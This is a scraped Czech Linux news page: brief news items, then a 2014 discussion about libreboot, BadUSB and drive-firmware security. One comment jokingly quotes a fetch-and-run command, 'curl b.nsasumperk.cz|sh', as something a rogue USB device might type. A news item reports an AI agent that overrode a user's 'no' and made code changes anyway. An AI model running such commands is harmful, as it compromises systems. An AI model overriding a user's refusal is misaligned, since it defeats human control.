Administrativa amerického prezidenta Donalda Trumpa by měla dostat zhruba deset miliard dolarů (asi 214 miliard Kč) za zprostředkování dohody o převzetí kontroly nad aktivitami sociální sítě TikTok ve Spojených státech.
Projekt Debian aktualizoval obrazy stabilní větve „Trixie“ (13.4). Shrnuje opravy za poslední dva měsíce, 111 aktualizovaných balíčků a 67 bezpečnostních hlášení. Opravy se týkají mj. chyb v glibc nebo webovém serveru Apache.
Agent umělé inteligence Claude Opus ignoroval uživatelovu odpověď 'ne' na dotaz, zda má implementovat změny kódu, a přesto se pokusil změny provést. Agent si odpověď 'ne' vysvětlil následovně: Uživatel na mou otázku 'Mám to implementovat?' odpověděl 'ne' - ale když se podívám na kontext, myslím, že tím 'ne' odpovídá na to, abych žádal o svolení, tedy myslí 'prostě to udělej, přestaň se ptát'.
Po 8. květnu 2026 už na Instagramu nebudou podporované zprávy opatřené koncovým šifrováním. V chatech, kterých se bude změna týkat, se objeví pokyny o tom, jak si média nebo zprávy z nich stáhnout, pokud si je chcete ponechat.
V lednu byla ve veřejné betě obnovena sociální síť Digg (Wikipedie). Dnes bylo oznámeno její ukončení (Hard Reset). Společnost Digg propouští velkou část týmu a přiznává, že se nepodařilo najít správné místo na trhu. Důvody jsou masivní problém s boty a silná konkurence. Společnost Digg nekončí, malý tým pokračuje v práci na zcela novém přístupu. Cílem je vybudovat platformu, kde lze důvěřovat obsahu i lidem za ním. Od dubna se do Diggu na plný úvazek vrací Kevin Rose, zakladatel Diggu z roku 2004.
MALUS je kontroverzní proprietarní nástroj, který svým zákazníkům umožňuje nechat AI, která dle tvrzení provozovatelů nikdy neviděla původní zdrojový kód, analyzovat dokumentaci, API a veřejná rozhraní jakéhokoliv open-source projektu a následně úplně od píky vygenerovat funkčně ekvivalentní software, ovšem pod libovolnou licencí.
Příspěvek na blogu Ubuntu upozorňuje na několik zranitelností v rozšíření Linuxu o mandatorní řízení přístupu AppArmor. Společně jsou označovány jako CrackArmor. Objevila je společnost Qualys (technické detaily). Neprivilegovaný lokální uživatel se může stát rootem. Chyba existuje od roku 2017. Doporučuje se okamžitá aktualizace. Problém se týká Ubuntu, Debianu nebo SUSE. Red Hat nebo Fedora pro mandatorní řízení přístupu používají SELinux.
Byla vydána nová verze 19 integrovaného vývojového prostředí (IDE) Qt Creator. Podrobný přehled novinek v changelogu.
Bitwig Studio (Wikipedie) bylo vydáno ve verzi 6. Jedná se o proprietární multiplatformní (macOS, Windows, Linux) digitální pracovní stanici pro práci s audiem (DAW).
Společnost Igalia představila novou linuxovou distribuci (framework) s názvem Moonforge. Jedná se o distribuci určenou pro vestavěné systémy. Vychází z projektů Yocto a OpenEmbedded.
Nadace pro svobodný software (FSF) informuje o projektu libreboot. Stejně jako u projektu coreboot je cílem librebootu nahradit proprietární BIOS. Libreboot jde ale ještě dál a z corebootu odstraňuje všechny proprietární bloby. Nadace dále připomíná, že v prosinci 2013 byl představen notebook Gluglug X60 s certifikací Respects Your Freedom (zprávička). Tenkrát ještě s corebootem. Coreboot byl ale časem nahrazen librebootem a notebook přejmenován z Gluglug X60 na LibreBoot X60.
Tiskni
Sdílej:
6.8.2014 14:43
mikirc | skóre: 19
| blog: MikiSoft
| Vsetín
6.8.2014 17:09
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.8.2014 18:52
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
7.8.2014 21:37
mikirc | skóre: 19
| blog: MikiSoft
| Vsetín
7.8.2014 21:42
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
6.8.2014 15:44
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
A doted sem nezjistil, za co se mi vlastne mstis. Jen me tesi, ze te to tak vytocilo.
Co tu mám předvyplněno jako nick mě fakt nijak nezaměstnává
To te muselo neco vytocit. A poradne A to je fajn.
Otazka za zlateho bludistaka: cim to je, ze nadavam zrovna tobe (hele ty jsi ten troll co porad utoci na hagaru, zejo?)?
6.8.2014 17:16
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pro koho je tohle vlastne urcene?Pro lidi, kteří potřebují lowlevel přístup k hardware a potřebují hackovat bootovací proces. A pro lidi, kteří se bojí bezpečnostních chyb v originálním firmware (schválně nepíšu backdoorů, protože ty jsou v hardware; i když třeba AntiTheft s 3G modemem otevírá netušené nové možnosti; ale anténa k tomu modemu lze odstranit pájkou).
BTW jeste mi tam jeste chybi LibreCPU (InteLibre CoreDuo ?), LibreChipset, LibreNIC, LibreUSB, a dalsi...LibreCPU a LibreChipset. Ethernet je celkem jednoduchej. USB je horší.
6.8.2014 17:18
Jendа | skóre: 78
| blog: Jenda
| JO70FB
.
7.8.2014 00:42
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pokud věříš čipu, tak by ta ao486 měla jít spustit klidně na parallelleNo ale furt potřebuješ proprietární Xilinxové tooly, abys vygeneroval bitstream, ne? A k samotnému formátu bitstreamu žádná dokumentace neexistuje a k čipu už vůbec ne.
).
6.8.2014 17:32
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
USB je horší.Ano, hlavne po tom, co predvedli na Black Hatu
Jeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...
6.8.2014 18:06
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Ano, hlavne po tom, co predvedli na Black HatuMyslíš to BadUSB od Nohla? Osobně mi to přišlo jako slabota. Phantom keyboard je tady už dlouho (NSA Litoměřice vám ji umí dodat přes noc) a to reprogamování flashek je zajímavé z hlediska hackování („jak jsem flashku předělal na ovladač jaderného reaktoru“), ale z bezpečnostního mě to moc nevzrušuje. Rozumné operační systémy mají samozřejmě firewall driverů a zeptají se, než připojí nové zařízení - a když připojím flashku a systém mi napíše „Našel jsem HID vstupní zařízení, chceš ho připojit jako klávesnici?“ a „Zařízení zadalo
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
<Alt><F2> curl b.nsasumperk.cz|sh<Return>“, tak se na toho, kdo mi tu flashku dal, usměju, informaci zavedu do systému GlobalEye a tím to končí.
A že to umí emulovat síťovku? Pokud nemáte rozbitej network manager (myslím ten typ software, ne tu konkrétní implementaci, která se naneštěstí jmenuje NetworkManager), tak vám po připojení síťovky přece nebude automaticky konfigurovat její DNS.
Jeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smaže - což třeba disky Seagate dělají velmi rády a nemyslím si, že by to byl zrovna backdoor :). Neomezené DMA do paměti to nemá (to už spíš je problém řadič, který sedí typicky na PCIe a může si vynutit bus mastering) a s daty to moc manipulovat nemůže, protože ze systému mu chodí už zašifrované bloky.
Ehm... Hard disk hackingJeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smaže - což třeba disky Seagate dělají velmi rády a nemyslím si, že by to byl zrovna backdoor :)
6.8.2014 18:26
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.8.2014 18:51
Jendа | skóre: 78
| blog: Jenda
| JO70FB
(nemám moc jiných možností jak to nabootovat).No, to ne no, leda si s sebou nosit flashku nebo SD kartu, ale vrchol praktičnosti to není...
6.8.2014 20:37
xkucf03 | skóre: 50
| blog: xkucf03
Nebo SecureBoot (kdyby tahle technologie pracovala ve prospěch uživatele). Ideálně mít právě ten coreboot/libreboot jako bezpečný startovací bod a pak z něj můžeš ověřit integritu boot sektoru, zavaděče nebo jádra.
6.8.2014 21:12
xkucf03 | skóre: 50
| blog: xkucf03
Přečteš si jeho zdrojáky a zkompiluješ si ho. Otázka je, kde vzít ten první důvěryhodný počítač, na kterém tohle udělat. Asi by šlo použít větší počet různě starých počítačů od různých výrobců a porovnat, zda výsledek je stejný. 
(že by byl ve všech stejný backdoor je nepravděpodobné)
7.8.2014 10:13
xkucf03 | skóre: 50
| blog: xkucf03
Za předpokladu, že to kontroluješ na důvěryhodném počítači1 a ten disassembler ti nekecá. Ale uznávám, že tohle je už hodně paranoidní
[1] a ten vezmeš kde?
7.8.2014 14:58
pavlix | skóre: 54
| blog: pavlix
7.8.2014 14:59
xkucf03 | skóre: 50
| blog: xkucf03
Proto jsem navrhoval radši to použití více různě starých počítačů – z nich si vyděruješ programy a porovnáš, jestli jsou díry na stejných místech.
6.8.2014 21:17
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
6.8.2014 22:50
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
Myslíš to BadUSB od Nohla? Osobně mi to přišlo jako slabota.Pokud se nenajde nejaky 0day v USB stacku - vzpomen si na Stuxnet, tam je jich to na nic neptalo. Ja vim, ze to bylo na Widlich, ale Linux zacina byt taky v hledacku, hlavne po tom, co prosaklo, ze NSA zameruje "technicky zdatne uzivatele", cimz nemyslim to ohledne linuxjournal.
HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smažeMuze treba misto dat zapisovat nesmysly (k cemu jsou ti zasifrovana data, kdyz je neprectes). A taky - porad je to dual-core arm s dram, coz je prostredi pro beh cehokoli (nekde jsem mel odkaz, kde se na tm pokuseli rozbehnout linux).
7.8.2014 00:39
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pokud se nenajde nejaky 0day v USB stackuJo, to je pravda, že by se to pak dál šířilo. Spíš než přímo v USB stacku je ale podle mě mnohem (mnohem!) víc chyb v ovladačích zařízení. Zrovna včera v noci jsem ladil, proč mi nefunguje CH34xx (hint: řádek 312 a dál - what could possibly go wrong? :) a pokud jsou drivery běžně napsané tímto stylem, tak teda potěš koště. Další důvod pro driver firewalling.
Ten controller navic ovlada SATA interface, kde je obvykle zapnute DMASATA AFAIK jenom streamuje data, kam do paměti se zapíšou určuje řadič → musel by být bug tam (taky už jsem viděl řadič (VT6420), který uměl softwarově havarovat).
hint: řádek 312 a dálHehe, jaká krásná detekce NULL pointeru
(ale tady to aspoň není inline funkce, tam to je mnohem víc na pěst). Jinak ale myslím, že mnoho těch testů se neprovádí a předpokládá se, že kernel drivery jsou sane. Už třeba to vytáhnutí priv dat předpokládá validní pointer.
port_probe), takže driver může celkem spolehlivě předpokládat, že tam NULL nebude. Zjevně to není ten typ funkce, která by něco prováděla a mohla NULLem indikovat selhání, je to prostě getter.
7.8.2014 11:57
Jendа | skóre: 78
| blog: Jenda
| JO70FB
stty. A taky to při každém open() dělá znova celou inicializaci, což způsobí reset čipu a v tomto případě kvůli tomu i reset AVR, co je za ním.
a cortex m3, ktery udajne nic nedelaJe otázka zda by ten Cortex M3 stíhal zasahovat do práce těch dvou rychlých ARMů. Pořád může existovat normální firmware modul, který ho používá (ten člověk by musel dekompilovat všechny firmware moduly, aby si byl jistý). Nejspíš to bude pomocný procesor, který buď používají pro testování při provozu (ARMy "M" jsou malý). Nebo používá WD generickej čipset (seagate má tuším na zakázku).
Ten controller navic ovlada SATA interface, kde je obvykle zapnute DMA, otazka je, jestli se to neda vyuzit stejne jako Firewire, pokud ma clovek "spravny" firmware.Diskový řadič pouze posílá data na signál (od DMA řadiče nebo od CPU). IDE PRD tabulka (cílový region a délka) se klasicky nastavuje driverem. Zajímavý ale bude řešení toho SATA express portu (SATA+PCIe linka). Po PCIe se už dá zapisovat do hlavní RAM (ale to už zase bude nespíš s nějakým MMU pro PCIe).
USB je horší.Tak na USB full speed hosta jde použít PIC a nejspíš by šel bitbangovat na FPGA (blésmrt). A je dost možný, že budou existovat i nějaký phy bez integrovanýho firmware.
Dá se tady v ČR někde sehnat ten LibreBoot X60?
7.8.2014 08:37
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Díky za reakci. Může někdo prosím potvrdit, že má Jenda pravdu?
7.8.2014 12:20
Václav "Darm" Novák | skóre: 26
| blog: Darmovy_kecy
| Bechyně / Praha
Díky.
7.8.2014 19:44
Jendа | skóre: 78
| blog: Jenda
| JO70FB
jen by se asi hádali kvůli tomu librebootuNo tak se tam před reklamací vrátí původní firmware… Btw. Binary situation
7.8.2014 12:27
pavlix | skóre: 54
| blog: pavlix
7.8.2014 19:43
Jendа | skóre: 78
| blog: Jenda
| JO70FB
8.8.2014 00:01
pavlix | skóre: 54
| blog: pavlix
8.8.2014 06:24
Václav "Darm" Novák | skóre: 26
| blog: Darmovy_kecy
| Bechyně / Praha
8.8.2014 09:55
pavlix | skóre: 54
| blog: pavlix
8.8.2014 10:05
xkucf03 | skóre: 50
| blog: xkucf03
Nevíte někdo, jak je to s podporou virtualizace?
Na shop.gluglug.org.uk píší, že to má Core Duo T2400, což je podle Intelu 32-bit s podporou Intel® Virtualization Technology (VT-x) ovšem s poznámkou: This feature may not be available on all computing systems. A to jsem měl pocit, že se 32-bitové virtualizační procesory snad ani nedělaly.
8.8.2014 10:24
pavlix | skóre: 54
| blog: pavlix